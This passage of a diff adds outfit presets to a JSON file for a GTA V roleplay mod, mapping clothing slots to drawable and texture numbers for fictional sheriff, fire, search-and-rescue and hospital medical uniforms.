+"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "51:1" + }, + { +"Name": "Male BCSO SAR Tech", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "90:8", +"Glasses": "24:1", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "146:4", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "88:8", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "2:4", +"Parachute": "20:1" + }, + { +"Name": "Female BCSO SAR Tech", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "89:7", +"Glasses": "14:1", +"Ear": "17:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "144:4", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "91:8", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "2:4", +"Parachute": "20:1" + }, + { +"Name": "Male BCSO SAR Coveralls", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "90:8", +"Glasses": "0:0", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:9", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "65:2", +"Shoes": "26:1", +"Accessories": "21:4", +"Armor": "1:1", +"Parachute": "51:1" + }, + { +"Name": "Female BCSO SAR Coveralls", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "89:8", +"Glasses": "14:1", +"Ear": "17:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:9", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "67:2", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "51:1" + }, + { +"Name": "Male LSFD USAR Tech", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "90:9", +"Glasses": "24:1", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:15", +"UpperSkin": "172:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "121:2", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "2:3", +"Parachute": "10:1" + }, + { +"Name": "Female USAR Tech", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "89:9", +"Glasses": "14:1", +"Ear": "17:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:23", +"UpperSkin": "45:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "127:2", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "2:3", +"Parachute": "10:1" + }, + { +"Name": "Male LSCoFD SAR", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "90:5", +"Glasses": "0:0", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "221:25", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "88:13", +"Shoes": "26:1", +"Accessories": "21:2", +"Armor": "1:1", +"Parachute": "10:1" + }, + { +"Name": "Female LSCoFD SAR", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "89:3", +"Glasses": "14:1", +"Ear": "17:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:25", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "91:13", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "2:3", +"Parachute": "10:1" + }, + { +"Name": "Male NPS SAR Tech", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "90:3", +"Glasses": "24:1", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:26", +"UpperSkin": "172:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "88:8", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "10:1" + }, + { +"Name": "Female NPS SAR Tech", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "89:3", +"Glasses": "23:1", +"Ear": "17:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:26", +"UpperSkin": "224:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "91:8", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "10:1" + }, + { +"Name": "Male SAMS EMT Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "216:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "72:1" + }, + { +"Name": "Male SAMS EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:7", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "72:1" + }, + { +"Name": "Male SAMS EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:7", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "72:1" + }, + { +"Name": "Male SAMS EMT Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:16", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "49:1" + }, + { +"Name": "Male SAMS Polo", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:25", +"UpperSkin": "86:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "1:1" + }, + { +"Name": "Female SAMS EMT Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "220:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "72:1" + }, + { +"Name": "Female SAMS EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:7", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:2", +"Armor": "34:1", +"Parachute": "72:1" + }, + { +"Name": "Female SAMS EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:7", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:2", +"Armor": "34:1", +"Parachute": "72:1" + }, + { +"Name": "Female SAMS EMT Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:16", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:2", +"Armor": "34:1", +"Parachute": "49:1" + }, + { +"Name": "Male SAMS Winter Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "3:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "250:1", +"UpperSkin": "32:1", +"Decal": "60:1", +"UnderCoat": "16:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "128:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female SAMS Winter Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "6:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "258:1", +"UpperSkin": "37:1", +"Decal": "68:1", +"UnderCoat": "15:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "97:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male SAMS Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "152:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "13:2", +"Parachute": "49:1" + }, + { +"Name": "Female SAMS Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "149:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "12:2", +"Parachute": "1:1" + }, + { +"Name": "Male SAMS Tac-Medic", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "60:10", +"Glasses": "0:0", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "186:1", +"Top": "221:20", +"UpperSkin": "94:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "88:3", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "4:1", +"Parachute": "50:1" + }, + { +"Name": "Female SAMS Tac-Medic", +"Gender": "Female", +"Hat": "60:1", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:20", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "91:12", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "6:3", +"Parachute": "50:9" + }, + { +"Name": "Male St-Fiacre EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:21", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "94:1" + }, + { +"Name": "Male St-Fiacre EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:21", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "94:1" + }, + { +"Name": "Female St-Fiacre EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:21", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:4", +"Armor": "34:1", +"Parachute": "94:1" + }, + { +"Name": "Female St-Fiacre EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:21", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:4", +"Armor": "34:1", +"Parachute": "94:1" + }, + { +"Name": "Male St-Fiacre Scrubs", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "33:5", +"UpperSkin": "86:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "46:7", +"Shoes": "43:3", +"Accessories": "118:3", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female St-Fiacre Scrubs", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "32:5", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "48:7", +"Shoes": "11:2", +"Accessories": "103:3", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male St-Fiacre ICU Doctor", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "41:4", +"Pants": "46:7", +"Shoes": "100:2", +"Accessories": "117:6", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male St-Fiacre MD Specialist", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "179:14", +"Pants": "11:11", +"Shoes": "22:3", +"Accessories": "117:6", +"Armor": "1:1", +"Parachute": "11:3" + }, + { +"Name": "Female St-Fiacre ICU Doctor", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "17:7", +"Pants": "48:7", +"Shoes": "11:2", +"Accessories": "88:5", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female St-Fiacre MD Specialist", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "20:10", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "105:2", +"Pants": "4:6", +"Shoes": "11:2", +"Accessories": "88:6", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Mount-Zonah EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:18", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "72:1" + }, + { +"Name": "Male Mount-Zonah EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:18", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "72:1" + }, + { +"Name": "Female Mount Zonah EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:18", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "72:1" + }, + { +"Name": "Female Mount Zonah EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:18", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "72:1" + }, + { +"Name": "Male Mount-Zonah Scrubs", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "33:2", +"UpperSkin": "86:2", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "46:2", +"Shoes": "43:3", +"Accessories": "118:2", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Mount-Zonah Scrubs", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "32:2", +"UpperSkin": "110:2", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "48:2", +"Shoes": "11:2", +"Accessories": "103:2", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Mount-Zonah ICU Doctor", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "41:1", +"Pants": "46:2", +"Shoes": "100:2", +"Accessories": "117:3", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Mount-Zonah MD Specialist", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:17", +"Pants": "11:6", +"Shoes": "41:10", +"Accessories": "117:4", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Mount-Zonah ICU Doctor", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "12:1", +"Top": "108:1", +"UpperSkin": "110:2", +"Decal": "1:1", +"UnderCoat": "17:1", +"Pants": "48:2", +"Shoes": "11:2", +"Accessories": "88:3", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Mount-Zonah MD Specialist", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "105:17", +"Pants": "4:11", +"Shoes": "11:2", +"Accessories": "88:4", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male CLSMD EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:17", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "49:1" + }, + { +"Name": "Male CLSMD EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:17", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "49:1" + }, + { +"Name": "Female CLSMD EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:17", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "49:1" + }, + { +"Name": "Female CLSMD EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:17", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "49:1" + }, + { +"Name": "Male CLSMD Scrubs", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:3", +"Top": "33:4", +"UpperSkin": "86:2", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "46:6", +"Shoes": "43:3", +"Accessories": "118:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female CLSMD Scrubs", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:3", +"Top": "32:4", +"UpperSkin": "110:2", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "48:6", +"Shoes": "11:2", +"Accessories": "103:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male CLSMD Doctor", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "41:3", +"Pants": "46:6", +"Shoes": "43:3", +"Accessories": "117:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male CLSMD Specialist MD", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "179:7", +"Pants": "11:5", +"Shoes": "43:3", +"Accessories": "117:2", +"Armor": "1:1", +"Parachute": "11:4" + }, + { +"Name": "Female CLSMD ICU Doctor", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "12:1", +"Top": "108:1", +"UpperSkin": "110:2", +"Decal": "1:1", +"UnderCoat": "17:3", +"Pants": "48:6", +"Shoes": "11:2", +"Accessories": "88:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female CLSMD MD Specialist", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "20:10", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "105:16", +"Pants": "4:7", +"Shoes": "11:2", +"Accessories": "88:2", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Pillbox Hill Scrubs", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "33:2", +"UpperSkin": "86:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "46:2", +"Shoes": "43:3", +"Accessories": "118:4", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Pillbox Hill Scrubs", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "32:2", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "48:2", +"Shoes": "11:2", +"Accessories": "103:4", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Pillbox Hill ICU Doctor", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "41:1", +"Pants": "46:2", +"Shoes": "100:2", +"Accessories": "117:7", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Pillbox Hill MD Specialist", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:16", +"Pants": "11:5", +"Shoes": "41:10", +"Accessories": "117:7", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Pillbox Hill ICU Doctor", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "12:1", +"Top": "108:1", +"UpperSkin": "110:2", +"Decal": "1:1", +"UnderCoat": "17:1", +"Pants": "48:2", +"Shoes": "11:2", +"Accessories": "88:8", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Pillbox Hill MD Specialist", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "20:10", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "78:2", +"Pants": "4:5", +"Shoes": "11:2", +"Accessories": "88:7", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Sandy Shores Scrubs", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:2", +"Top": "33:4", +"UpperSkin": "86:2", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "46:6", +"Shoes": "43:3", +"Accessories": "118:5", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Sandy Shores Scrubs", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:2", +"Top": "32:4", +"UpperSkin": "110:2", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "48:6", +"Shoes": "11:2", +"Accessories": "103:5", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Sandy Shores ICU Doctor", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "41:3", +"Pants": "46:6", +"Shoes": "100:2", +"Accessories": "117:8", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Sandy Shores MD Specialist", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "30:16", +"Pants": "5:2", +"Shoes": "39:1", +"Accessories": "117:8", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Sandy Shores ICU Doctor", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "12:2", +"Top": "108:1", +"UpperSkin": "110:2", +"Decal": "1:1", +"UnderCoat": "17:3", +"Pants": "48:6", +"Shoes": "11:2", +"Accessories": "88:8", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Sandy Shores MD Specialist", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "20:10", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "1:16", +"Pants": "6:9", +"Shoes": "11:4", +"Accessories": "88:8", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Paleto Bay Scrubs", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "32:6", 